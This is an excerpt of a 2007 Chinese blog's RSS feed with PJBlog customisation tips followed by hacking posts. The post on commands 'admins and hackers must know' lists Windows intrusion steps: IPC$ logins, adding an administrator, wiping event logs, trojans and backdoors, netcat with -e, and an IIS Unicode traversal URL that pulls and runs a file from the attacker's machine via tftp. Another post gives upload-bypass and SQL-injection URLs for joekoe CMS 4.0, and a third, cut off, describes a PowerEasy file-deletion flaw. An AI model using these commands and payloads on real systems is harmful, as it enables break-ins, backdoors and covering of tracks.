target="_blank">http://www.langtaosha.net/pick/index.asp</a> <br/>5&gt;　网站名称：中原品网<br/>　　网站地址：<a href="http://www.zpick.com/pick" target="_blank">http://www.zpick.com/pick</a> <br/>6&gt;　网站名称：文化空间<br/>　　网站地址：<a href="http://www.xiaoxiang.net/web" target="_blank">http://www.xiaoxiang.net/web</a> <br/>7&gt;　网站名称：94cool<br/>　　网站地址：<a href="http://94cool.org/meng/default.asp" target="_blank">http://94cool.org/meng/default.asp</a> <br/>8&gt;　网站名称：星期天网站联盟社区<br/>　　网站地址：<a href="http://www.7sunday.com/" target="_blank">http://www.7sunday.com/</a> <br/>9&gt;　网站名称：蚁盟<br/>　　网站地址：<a href="http://www.yimeng.org/" target="_blank">http://www.yimeng.org/</a> <br/>10&gt; 网站名称：中国网页设计师联盟<br/>　　网站地址：<a href="http://www.dreamofdesign.com/chinese/" target="_blank">http://www.dreamofdesign.com/chinese/</a> <br/><br/><br/>原文网址：<a href="http://iyuer.com/ilank/article.asp?id=108" target="_blank">http://iyuer.com/ilank/article.asp?id=108</a><br/>原文网址：<a href="http://iyuer.com/ilank/article.asp?id=108" target="_blank">http://iyuer.com/ilank/article.asp?id=108</a><br/>原文网址：<a href="http://iyuer.com/ilank/article.asp?id=108" target="_blank">http://iyuer.com/ilank/article.asp?id=108</a>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=273</link>
			<title><![CDATA[Pjblog技巧集合]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[网络技术]]></category>
			<pubDate>Sat,13 Oct 2007 08:02:06 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=273</guid>	
		<description><![CDATA[01. 更改默认的“Cookie,Application域”<br/>===================================================<br/>一个服务器上如果存在多个Cookies域一样的PJBlog，那么这些Bolg都将无法运行，修改方法：打开Blog根目录下的“const.asp”，修改15、16行Const CookieName=&#34;&#34;和Const CookieNameSetting=&#34;&#34;的值。<br/><br/>02. 更改数据库后缀名，消除“数据库连接出错”的错误提示<br/>===================================================<br/>个别空间不支持以“.asp”为后缀名的Access数据库，会出现“数据库连接出错，请检查连接字串!”的错误提示，修改方法：首先把blogDB目录下的数据库文件由*.asp改为*.mdb，然后更改“const.asp”第37行“Const AccessFile”的数据库路径和文件名。<br/><br/>03.1. 修改验证码，使它永远只出现四个“0”<br/>===================================================<br/>在个人Blog中使用验证码没什么意义，PJBlog后台又没有关闭验证码的选项，所以最好的办法就是让它只显示最简单的符号，本站把验证码全部改为4个“0”：<br/>找到common\GetCode.asp，修改“Dim i, ii, iii”下面这段为：<br/>Const cOdds = 0 &#39; 不出现杂点<br/>Const cAmount = 1 &#39; 就取一个符号，默认是0<br/>Const cCode = &#34;0123456789&#34; &#39;这一行可以不用改的<br/><br/>03.2. 使系统自动填写验证码(再复杂的验证码也不用手工输入了，呵呵(0927)<br/>===================================================<br/>在Blog根目录新建一个“*.asp”文件，在里面填写以下代码：<br/>&lt;script&gt;if(parent.document.all.validate)parent.document.all.validate.value=&#34;&lt;%=Session(&#34;GetCode&#34;)%&gt;&#34;;&lt;/script&gt;<br/>然后在footer.asp的最上面插入一句：<br/>&lt;iframe frameborder=&#34;no&#34; height=0 width=0 src=&#34;*.asp&#34;&gt;&lt;/iframe&gt;<br/><br/>04. 在common/library.asp中修改侧边栏“用户面板”的条目名称<br/>===================================================<br/>侧边栏用户面板中默认的项目名称有长有短，看着很不美观，修改library.asp第83行以下的内容，本站把它们都改为四个字的，即“系统管理”“发表日志”“编辑草稿”“修改资料”“退出系统”。<br/><br/>05. 修改建站时间<br/>===================================================<br/>在后台“设置模块”找到模块标识为“BlogInfo”模块，点击后面的“编辑HTML源代码”进行修改；另外，侧边栏统计信息里的留言默认是没有链接的，在这里也可以进行编辑把链接加上，把整句代码改成<br/>程序代码<br/>留言: &lt;a href=&#34;LoadMod.asp?plugins=GuestBookForPJBlog&#34;&gt;&lt;b&gt;$blog_MessageNums$&lt;/b&gt; 个&lt;/a&gt;&lt;br/&gt;<br/><br/>06. 在侧边栏上部增加公告栏或站长信息栏<br/>===================================================<br/>进入后台“界面与插件”－“设置模块”，在页面下方新建一个“侧边模块”，模块标识任意，名称为“公告板”或“站长档案”，注意排序要设为最小，点击“保存模块”。保存后点击后面的“编辑HTML源代码”，如果是用作静态公告板，则直接往里边写字就行了。如果是用作站长信息栏，可以在里面添加照片、说明什么的，可以效仿以下代码：<br/>程序代码<br/>&lt;div style=&#34;PADDING-RIGHT: 4px; PADDING-LEFT: 4px; PADDING-BOTTOM: 4px; PADDING-TOP: 4px; TEXT-ALIGN: left&#34;&gt;<br/>&lt;a href=&#34;点击图片后指向的链接地址&#34; target=&#34;_blank&#34;&gt;&lt;img border=&#34;0&#34; alt=&#34;XHTML 1.0 Transitional&#34; src=&#34;站长信息的图片地址&#34;/&gt;&lt;/a&gt;<br/>&lt;/div&gt;<br/><br/>07. 在日志正文上方增加一滚动的公告板或广告板<br/>===================================================<br/>进入后台“界面与插件-设置模块”，在页面下方新建一个“内容模块”，模块标识和名称任意，注意排序要比“ContentList”小，点击“保存模块”。保存后点击后面的“编辑HTML源代码”，填入以下代码：<br/>程序代码<br/>&lt;div style=&#34;CLEAR: none; BORDER-RIGHT: #dbdbd0 1px solid; BORDER-TOP: #dbdbd0 1px solid; BACKGROUND: #fff; MARGIN: 5px; BORDER-LEFT: #dbdbd0 1px solid; WIDTH: 98%; BORDER-BOTTOM: #dbdbd0 1px solid; HEIGHT: 15px&#34;&gt;<br/><br/>&lt;div style=&#34;PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 3px; FLOAT: left; PADDING-BOTTOM: 0px; WIDTH: 5px; COLOR: #2e8b57; PADDING-TOP: 6px&#34;&gt;公&lt;/div&gt;<br/>&lt;div style=&#34;PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 1px; FLOAT: left; PADDING-BOTTOM: 0px; WIDTH: 5px; COLOR: #2e8b57; PADDING-TOP: 6px&#34;&gt;告&lt;/div&gt;<br/><br/>&lt;div style=&#34;MARGIN: 3px&#34;&gt;&lt;marquee&nbsp;&nbsp;onmouseout=&#34;this.start()&#34; scrollamount=&#34;3&#34; scrolldelay=&#34;15&#34; direction=&#34;left&#34; height=&#34;15&#34;&gt;<br/>&lt;font color=&#34;#999999&#34;&gt;[时间或编号]&lt;/font&gt;&lt;font color=&#34;#0000ff&#34;&gt;&lt;b&gt;第一条公告题头&lt;/b&gt;第一条公告内容&lt;/font&gt;<br/><br/>&lt;font color=&#34;#999999&#34;&gt;[时间或编号]&lt;/font&gt;&lt;font color=&#34;#0000ff&#34;&gt;&lt;b&gt;第二条公告题头&lt;/b&gt;第二条公告内容&lt;/font&gt;<br/><br/>&lt;/marquee&gt;&lt;/div&gt;&lt;/div&gt;<br/>其中WIDTH: 98%是宽度，HEIGHT: 15px是高度(这个高度为显示一行文字)，scrollamount=&#34;3&#34;为滚动速度，direction=&#34;left&#34;为滚动方向(left是从右到左)。<br/><br/><br/>===========================pc-mac 修改的公告代码==============================<br/>&lt;table cellpadding=&#34;0&#34; cellspacing=&#34;0&#34; width=&#34;98%&#34; height=&#34;30&#34; border=&#34;0&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;!-- MSTableType=&#34;layout&#34; --&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;tr&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;td height=&#34;30&#34; valign=&#34;middle&#34; width=&#34;60&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;p align=&#34;center&#34;&gt;&lt;font face=&#34;宋体&#34; color=&#34;#009900&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;span style=&#34;font-size: 9pt; font-weight: 700&#34;&gt;公告：&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;td height=&#34;30&#34; valign=&#34;middle&#34; width=&#34;852&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;font face=&#34;宋体&#34; color=&#34;#0000ff&#34;&gt;&lt;span style=&#34;font-size: 9pt; font-weight: 700&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;marquee&nbsp;&nbsp;onmouseout=&#34;this.start()&#34; valign=&#34;middle&#34; scrollamount=&#34;3&#34; scrolldelay=&#34;15&#34; height=&#34;12&#34;&gt;博客开通，诚邀友情链接。&lt;/marquee&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/tr&gt;<br/>&lt;/table&gt;<br/><br/>===========================修正了公告与内容的对齐==========================<br/>08. 增加相册功能，手工添加相册首页链接<br/>===================================================正在筹备当中，敬请关注。<br/><br/>X1. 在线音乐播放器修改指南<br/>===================================================<br/>本站采用的播放器是aboutplayer(随机版)，相比其他同类软件主要有以下几个优点：a.可以添加播放本地文件；b.在同一页面可查看播放列表并选曲；c.碰到链接失效的文件会自动重试3次，如果判断真的失效，会自动接着播放其他的曲目(主要优点)。<br/><br/>01.把播放器解压缩到“music”目录并放在你的网站根目录下；<br/>02.在你的Blog目录下新建一个“index.htm”的文件，添加如下的框架代码：<br/>程序代码<br/>&lt;html&gt;<br/>&lt;head&gt;<br/>&lt;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;title&gt;╃电老虎成长日记╉音乐版&lt;/title&gt;<br/>&lt;/head&gt;<br/>&lt;frameset rows=&#34;*,22&#34; frameborder=&#34;NO&#34; border=&#34;0&#34; framespacing=&#34;0&#34;&gt;<br/>&lt;frame src=&#34;/PJBlog/default.asp(注：Blog首页面的地址)&#34; name=&#34;mainFrame&#34; scrolling=&#34;yes&#34;&gt;<br/>&lt;frame src=&#34;/music/sel&#101;ctindex.htm(注：音乐播放器的地址)&#34; name=&#34;bottomFrame&#34; scrolling=&#34;NO&#34; noresize&gt;<br/>&lt;/frameset&gt;<br/>&lt;noframes&gt;&lt;/noframes&gt;<br/>&lt;/html&gt;<br/>上面的&#34;*,22&#34;表示Blog主体页面在上方，音乐播放器在下方，且播放器的高度为22象素；<br/>03.在播放器中增加关闭播放器的功能。在播放器的首页中加如下代码：<br/>&lt;a href=&#34;<a href="http://" target="_blank">http://</a>你的Blog首页面(如index.asp)&#34; target=&#34;_top&#34;&gt;关闭播放器&lt;/a&gt;<br/>04.播放列表为：music/js/data.js，文件里附有操作说明。<br/><br/>X2. 设置自动跳转页面<br/>===================================================<br/>有时候网站程序不是放在空间根目录下的，这时候需要一个从根目录跳转到子目录的文件，把以下代码存成index.htm或index.asp放在网站根目录即可：<br/>程序代码<br/>&lt;html&gt;<br/>&lt;head&gt;<br/>&lt;meta http-equiv=&#34;Content-Language&#34; content=&#34;zh-CN&#34;&gt;<br/>&lt;meta HTTP-EQUIV=&#34;Content-Type&#34; CONTENT=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;title&gt;&lt;/title&gt;<br/>&lt;/head&gt;<br/>&lt;body&gt;<br/>&lt;meta http-equiv=&#34;refresh&#34; content=&#34;0.1;url=PJBlog/index.htm(根据自己的情况修改)&#34;&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>X3. 给每个Skin增加了四彩鼠标样式<br/>===================================================<br/>01.把四彩鼠标指针拷贝到“images”目录，<br/>02.修改每个皮肤文件夹里的global.css，在body段添加一行“cursor:url(&#39;./images/blue.cur&#39;);”<br/>03.修改每个皮肤文件夹里的link.css，分别给a:link、a:visited和a:active添加鼠标指针样式；<br/><br/>===================================================<br/><br/>00. 所有日记在普通模式时皆为回缩模式<br/><br/>打开class/cls_default.asp，找到代码：&lt;div class=&#34;BttnE&#34; &gt;&lt;/div&gt;，将其前后的语句：&lt;%If webLogArr(9,PageCount)=True Then%&gt;和&lt;%end if%&gt;删除。<br/><br/>然后打开class/lcls_logAction.asp，找到：Temp2=Replace(Temp2,&#34;&lt;$ShowStyle$&gt;&#34;,&#34; style=&#34;&#34;display:none&#34;&#34;&#34;)，将其前后 if 到 end if 的代码都删除<br/>===================================================<br/><br/>37. 各种样式的光标<br/>auto ：标准光标<br/>default ：标准箭头<br/>hand ：手形光标<br/>wait ：等待光标<br/>text ：I形光标<br/>vertical-text ：水平I形光标<br/>no-dro&#112; ：不可拖动光标<br/>not-allowed ：无效光标<br/>help ：?帮助光标<br/>all-scroll ：三角方向标<br/>move ：移动标<br/>crosshair ：十字标<br/>e-resize<br/>n-resize<br/>nw-resize<br/>w-resize<br/>s-resize<br/>se-resize<br/>sw-resize<br/>===================================================<br/><br/>38.页面进入和退出的特效<br/>进入页面&lt;meta http-equiv=&#34;Page-Enter&#34; content=&#34;revealTrans(duration=x, transition=y)&#34;&gt;<br/>推出页面&lt;meta http-equiv=&#34;Page-Exit&#34; content=&#34;revealTrans(duration=x, transition=y)&#34;&gt; <br/>这个是页面被载入和调出时的一些特效。duration表示特效的持续时间，以秒为单位。transition表示使用哪种特效，取值为1-23:<br/>　　0 矩形缩小 <br/>　　1 矩形扩大 <br/>　　2 圆形缩小<br/>　　3 圆形扩大 <br/>　　4 下到上刷新 <br/>　　5 上到下刷新<br/>　　6 左到右刷新 <br/>　　7 右到左刷新 <br/>　　8 竖百叶窗<br/>　　9 横百叶窗 <br/>　　10 错位横百叶窗 <br/>　　11 错位竖百叶窗<br/>　　12 点扩散 <br/>　　13 左右到中间刷新 <br/>　　14 中间到左右刷新<br/>　　15 中间到上下<br/>　　16 上下到中间 <br/>　　17 右下到左上<br/>　　18 右上到左下 <br/>　　19 左上到右下 <br/>　　20 左下到右上<br/>　　21 横条 <br/>　　22 竖条 <br/>　　23 以上22种随机选择一种<br/>===================================================<br/>x7.去掉皮肤横幅处的网站名称及简介<br/>===============================================================<br/>#container #header #blogname{display:none}<br/>#container #header #blogname #blogtitle{display:none}<br/><br/>x8.去除超级链接的下划线<br/>===============================================================<br/>个别皮肤的超级链接都是有下划线的，有时候看着不太美观，我们可以通过修改link.css把它们去掉。控制下划线的属性是“text-decoration”，有下划线的参数是“text-decoration:underline”，没有下划线的参数是“text-decoration:none”。如果不使用“text-decoration”属性，默认是有下划线的。你可以把不想要下划线的地方由“underline”替换成“none”，或者干脆把所有的都替换了。<br/><br/>x8.重装系统应该备份的文件<br/>===============================================================<br/>1.备份blogDB目录下的数据库<br/>2.备份attachments目录下的文件，这个目录里都是上传的附件<br/>3.备份Plugins目录下的文件，这里面都是BLOG的插件<br/>4.备份skins目录下的文件，这里面都是皮肤文件<br/>5.备份根目录下的plugins.asp文件<br/><br/>基本上就这些了，如果BLOG出现了什么问题的话，直接用这些文件覆盖回去就可以了。<br/><br/>x9.禁止复制的代码和方法<br/>=============================================================<br/>在系统首页文件(default.asp)和日志文件(article.asp)最底下加入如下代码即可.这两个文件都在根目录下.<br/><br/>&lt;noscript&gt;<br/>&lt;iframe scr=&#34;*.htm&#34;&gt;&lt;/iframe&gt;<br/>&lt;/noscript&gt;<br/>&lt;script language=&#34;JavaScript&#34;&gt;<br/>document.oncontextmenu=new Function(&#34;event.returnValue=false;&#34;);<br/>document.onsel&#101;ctstart=new Function(&#34;event.returnValue=false;&#34;);<br/>&lt;/script&gt; <br/>x10.一些关于PJ文件的说明<br/>根目录.&#34;footer.asp&#34;底部页面文件,用途可以加上自定义的代码,如加上统计代码.<br/>根目录.&#34;BlogLink.asp&#34;申请链接页面,用途可以加上自己的网站信息,或者其他.<br/>根目录.&#34;const.asp&#34;数据库和Cookies域文件,适当修改可以增加一定的安全性.<br/>&#34;Template\Article.asp&#34;文件,用途适当修改可以在日志底部加入广告代码或其他.<br/>=============================================================<br/>3.首段首行缩进<br/><br/><br/>　　首段首行无法缩进，是因为PJBlog2自动删除了日志头尾的空格，实现缩进的修改方法相当的简单，只要找到common文件夹下的function.asp文件，在第279行找到Str=Trim(Str)，改成Str=RTrim(Str)就可以了。<br/>　　还有发表日志时首行最好使用全角空格，因为半角空格在不同的字体下可能长度与汉字有所不同。<br/>　　此外由于修改以后日志前面的空格是不会自动删除的，可能会影响日志显示的美观，所以在发表日志时要注意前面不要留空。<br/>=============================================================<br/><br/>以下是问题集合(来自本论坛,有很多没测试,本也是菜鸟哈,只是方便大家而已!有问题我不负责,考虑谨慎使用)<br/><br/>--------------------------------------------------------------------------------<br/>1. 怎么样修改,让上传得附件与原来同名,而不是让系统自动生产.<br/>打開attachment.asp<br/>找到 <br/>F_Name=randomStr(1)&amp;Year(now)&amp;Month(now)&amp;Day(now)&amp;Hour(now)&amp;Minute(now)&amp;Second(now)&amp;&#34;.&#34;&amp;F_File.FileExt<br/>改為<br/>F_Name=F_File.filename<br/>Ok。<br/><br/>以後可能出現文件名重復，出錯！不要怪我。 <br/><br/>--------------------------------------------------------------------------------<br/><br/>2. 手机怎么上我们的BLOG网站&nbsp;&nbsp;？<br/>1、你的手机要支持GPRS<br/>2、你的手机开通GPRS<br/>3、在手机的“网络”功能里输入“<a href="http://" target="_blank">http://</a>你的网址/wap.asp”就可以访问到你的blog了 <br/><br/>--------------------------------------------------------------------------------<br/><br/><br/>3三种屏蔽、过滤垃圾评论和留言广告的方法<br/><br/>当你一大早起来就发现留言本和评论里又多了好多好多条垃圾留言，一个一个的删吧，天天如此，累？！抓狂？！<br/>本方法，可以检测提交的垃圾信息，例如垃圾评论、垃圾留言或者屏蔽某未注册用户的发言，都是可以的。<br/><br/>原创作者：番茄（<a href="http://www.tblog.com.cn" target="_blank">http://www.tblog.com.cn</a>），特别感谢！<br/><br/>为尊重作者的劳动成果，请到作者站点查看代码：<br/><br/>第一种方法：<a href="http://www.tblog.com.cn/article.asp?id=290" target="_blank">http://www.tblog.com.cn/article.asp?id=290</a>&nbsp;&nbsp;<br/>把代码加在 const.asp 的最后 （加在最后面的 %&gt;之前）<br/>工具发的垃圾留言，可以在过滤字段中加入该评论作者的IP地址，和发出来的一些域名，另外如果&lt;h1&gt;用处不大的话也一起给过滤掉。<br/><br/>第二种方法：<a href="http://www.tblog.com.cn/article.asp?id=294" target="_blank">http://www.tblog.com.cn/article.asp?id=294</a><br/><br/>另外，第一种方法能够比较好的屏蔽垃圾留言，但是显示警告信息时经常为乱码；<br/>第二种方法可以写成插件了，在插件未完成之前，大家可以先加入屏蔽代码救急，番茄会尽快完成过滤补丁的安装文件以及过滤关键词管理插件。请大家等待。<br/><br/>第三种方法：（推荐）<br/>下载官方的管理员提供的一个补丁...<br/><br/>--------------------------------------------------------------------------------<br/><br/>4.关于首页左右英文的修改<br/><br/>到后台界面与插件里，设置模块里改相对的英文提交就就可以了。。。 <br/>--------------------------------------------------------------------------------<br/>5.如何才能把侧边栏移到左边？<br/><br/>在SKIN中设置，打开layout.css，把sidebar的float:left改为right，mainContent的float:right改为left就OK了 <br/><br/>6.如何解决：抱歉网站暂时关闭此类问题？<br/><br/>可以手动打开站点<br/>先到 login.asp 登陆<br/>然后打开 control.asp 登陆后台开启即可<br/>出现这样的问题,是由于后台在处理某个需要关闭数据的工作后出错导致无法再次打开数据库.<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=272</link>
			<title><![CDATA[网管和黑客都必须知道的命令]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[网络技术]]></category>
			<pubDate>Wed,03 Oct 2007 13:31:24 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=272</guid>	
		<description><![CDATA[常用的几条NET命令：&nbsp;&nbsp;<br/><br/>　　（与远程主机建立空管连接） net use \\IP地址\ipc$ &#34;&#34; /use:&#34;&#34;&nbsp;&nbsp;<br/><br/>　　（以管理员身份登录远程主机） net use \\IP地址\ipc$ &#34;密码&#34; /use:&#34;Administrator&#34;&nbsp;&nbsp;<br/><br/>　　（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 \\IP地址\admin$&nbsp;&nbsp;<br/><br/>　　（查看远程主机时间） net time \\IP地址&nbsp;&nbsp;<br/><br/>　　（定时启动某个程序） at \\IP地址 02:18 readme.exe&nbsp;&nbsp;<br/><br/>　　（查看共享） net view \\IP地址&nbsp;&nbsp;<br/><br/>　　（查看netbios工作组列表） nbtstat -A IP地址&nbsp;&nbsp;<br/><br/>　　（将远程主机C盘映射为自己的F盘） net use f: \\IP地址\c$ &#34;&#34;/user:&#34;Administrator&#34;&nbsp;&nbsp;<br/><br/>　　（这两条把自己增加到管理员组）： net user 用户名 密码 /add&nbsp;&nbsp;<br/><br/>　　net localgroup Administrators 用户名 /add&nbsp;&nbsp;<br/><br/>　　（断开连接） net use \\IP地址\ipc$ /del&#101;te&nbsp;&nbsp;<br/><br/>　　扫尾：&nbsp;&nbsp;<br/><br/>　　del C:\winnt\system32\logfiles\*.*&nbsp;&nbsp;<br/><br/>　　del C:\winnt\ssytem32\config\*.evt&nbsp;&nbsp;<br/><br/>　　del C:\winnt\system32\dtclog\*.*&nbsp;&nbsp;<br/><br/>　　del C:\winnt\system32\*.log&nbsp;&nbsp;<br/><br/>　　del C:\winnt\system32\*.txt&nbsp;&nbsp;<br/><br/>　　del C:\winnt\*.txt&nbsp;&nbsp;<br/><br/>　　del C:\winnt\*.log&nbsp;&nbsp;<br/><br/>　　一、netsvc.exe&nbsp;&nbsp;<br/><br/>　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：&nbsp;&nbsp;<br/><br/>　　netsvc /list \\IP地址&nbsp;&nbsp;<br/><br/>　　netsvc schedule \\IP地址 /query&nbsp;&nbsp;<br/><br/>　　netsvc \\IP地址 schedule /start&nbsp;&nbsp;<br/><br/>　　二、OpenTelnet.exe&nbsp;&nbsp;<br/><br/>　　远程启动主机的Telnet服务，并绑定端口到7878，例如：&nbsp;&nbsp;<br/><br/>　　OpenTelnet \\IP地址 用户名 密码 1 7878&nbsp;&nbsp;<br/><br/>　　然后就可以telnet到主机的7878端口，进入DOS方式下：&nbsp;&nbsp;<br/><br/>　　telnet IP地址 7878&nbsp;&nbsp;<br/><br/>　　三、winshell.exe&nbsp;&nbsp;<br/><br/>　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD&gt;后，可打下面的命令：&nbsp;&nbsp;<br/><br/>　　p Path （查看winshell主程序的路径信息）&nbsp;&nbsp;<br/><br/>　　b reBoot （重新启动机器）&nbsp;&nbsp;<br/><br/>　　d shutDown （关闭机器）&nbsp;&nbsp;<br/><br/>　　s Shell （执行后你就会看到可爱的“C:\&gt;”）&nbsp;&nbsp;<br/><br/>　　x eXit （退出本次登录会话，此命令并不终止winshell的运行）&nbsp;&nbsp;<br/><br/>　　CMD&gt; <a href="http://.../srv.exe" target="_blank">http://.../srv.exe</a> （通过http下载其他网站上的文件到运行winshell的机器上）&nbsp;&nbsp;<br/><br/>　　四、3389登陆器，GUI方式登录远程主机的&nbsp;&nbsp;<br/><br/>　　五、elsave.exe&nbsp;&nbsp;<br/><br/>　　事件日志清除工具&nbsp;&nbsp;<br/><br/>　　elsave -s \\IP地址 -l &#34;application&#34; -C&nbsp;&nbsp;<br/><br/>　　elsave -s \\IP地址 -l &#34;system&#34; -C&nbsp;&nbsp;<br/><br/>　　elsave -s \\IP地址 -l &#34;security&#34; -C&nbsp;&nbsp;<br/><br/>　　执行后成功清除应用程序日志，系统日志，安全日志&nbsp;&nbsp;<br/><br/>　　六、hbulot.exe&nbsp;&nbsp;<br/><br/>　　开启win2kserver和winxp的3389服务&nbsp;&nbsp;<br/><br/>　　hbulot [/r]&nbsp;&nbsp;<br/><br/>　　使用/r表示安装完成后自动重起目标使设置生效。&nbsp;&nbsp;<br/><br/>　　七、nc.exe(netcat.exe)&nbsp;&nbsp;<br/><br/>　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。&nbsp;&nbsp;<br/><br/>　　想要连接到某处: nc [-options] hostname port[s] [ports] ...&nbsp;&nbsp;<br/><br/>　　绑定端口等待连接: nc -l -p port [-options] [hostname] [port]&nbsp;&nbsp;<br/><br/>　　参数:&nbsp;&nbsp;<br/><br/>　　-e prog 程序重定向，一旦连接，就执行 [危险!!]&nbsp;&nbsp;<br/><br/>　　-g gateway source-routing hop point[s], up to 8&nbsp;&nbsp;<br/><br/>　　-G num source-routing pointer: 4, 8, 12, ...&nbsp;&nbsp;<br/><br/>　　-h 帮助信息&nbsp;&nbsp;<br/><br/>　　-i secs 延时的间隔&nbsp;&nbsp;<br/><br/>　　-l 监听模式，用于入站连接&nbsp;&nbsp;<br/><br/>　　-n 指定数字的IP地址，不能用hostname&nbsp;&nbsp;<br/><br/>　　-o file 记录16进制的传输&nbsp;&nbsp;<br/><br/>　　-p port 本地端口号&nbsp;&nbsp;<br/><br/>　　-r 任意指定本地及远程端口&nbsp;&nbsp;<br/><br/>　　-s addr 本地源地址&nbsp;&nbsp;<br/><br/>　　-u UDP模式&nbsp;&nbsp;<br/><br/>　　-v 详细输出——用两个-v可得到更详细的内容&nbsp;&nbsp;<br/><br/>　　-w secs timeout的时间&nbsp;&nbsp;<br/><br/>　　-z 将输入输出关掉——用于扫描时&nbsp;&nbsp;<br/><br/>　　八、TFTPD32.EXE&nbsp;&nbsp;<br/><br/>　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如：&nbsp;&nbsp;<br/><br/>　　<a href="http://IP" target="_blank">http://IP</a>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名&nbsp;&nbsp;<br/><br/>　　然后可以直接令文件运行：&nbsp;&nbsp;<br/><br/>　　<a href="http://IP" target="_blank">http://IP</a>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名&nbsp;&nbsp;<br/><br/>　　九、prihack.exe是IIS的printer远程缓冲区溢出工具&nbsp;&nbsp;<br/><br/>　　idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。&nbsp;&nbsp;<br/><br/>　　一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接。<br/> <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=271</link>
			<title><![CDATA[乔客(joekoe) CMS 4.0 的2个高危漏洞]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[黑客攻防]]></category>
			<pubDate>Wed,19 Sep 2007 10:35:00 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=271</guid>	
		<description><![CDATA[1 .上传漏洞：很好利用，把channel变量改一下，只要不等于forum、user.face、blog.logo就行，然后filetype改成asa,就可以光明正大的上传木马了，具体url可以这样common/upload.asp?channel=use2&amp;filetype=asa&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbname=&amp;thumbinput=然后上传[PS：要登陆验证] <br/><br/>2. SQL注入漏洞：在Channel变量中加入诸如语句，比如：common/upload.asp?channel=use&#39;&amp;filetype=gif&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbname=&amp;thumbinput= <br/><br/>然后上传，就会报错. <br/><br/>&nbsp;&nbsp;<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.9427188.com/default.asp?id=270</link>
			<title><![CDATA[动易网站管理系统删除任意文件漏洞]]></title>
			<author>ui47@163.com(admin)</author>
			<category><![CDATA[网络技术]]></category>
			<pubDate>Wed,19 Sep 2007 10:33:01 +0800</pubDate>
			<guid>http://www.9427188.com/default.asp?id=270</guid>	
		<description><![CDATA[这个漏洞对于动易网站管理系统来说，就是致命的了。<br/>此漏洞存在于User目录下的User_saveflash.asp文件中，其第6～22行代码如下所示。<br/><br/>Dim act, ObjInstalled_FSO, color_name, Cr&#101;ate_1, imgurl, SaveFileName, dirMonth<br/><br/>objName_FSO = Application(&#34;objName_FSO&#34;)<br/><br/>ObjInstalled_FSO = IsObjInstalled(objName_FSO)<br/><br/>If ObjInstalled_FSO = True Then<br/><br/>Set fso = Server.Cr&#101;ateObject(objName_FSO)<br/><br/>Else<br/><br/>Response.Write &#34;&amp;&amp;SendFlag=保存 &gt;&gt;&gt; NO&#34;<br/><br/>Response.end<br/><br/>End If<br/><br/>act = trim(request(&#34;act&#34;))<br/><br/>//这里是关键<br/><br/>If act=&#34;&#34; Then<br/><br/>Call Main()<br/><br/>Else<br/><br/>　　Call CoverColorFile()<br/><br/>　　//如果act不为空，则调用CoverColorFile()函数<br/><br/>End If<br/><br/>set fso = 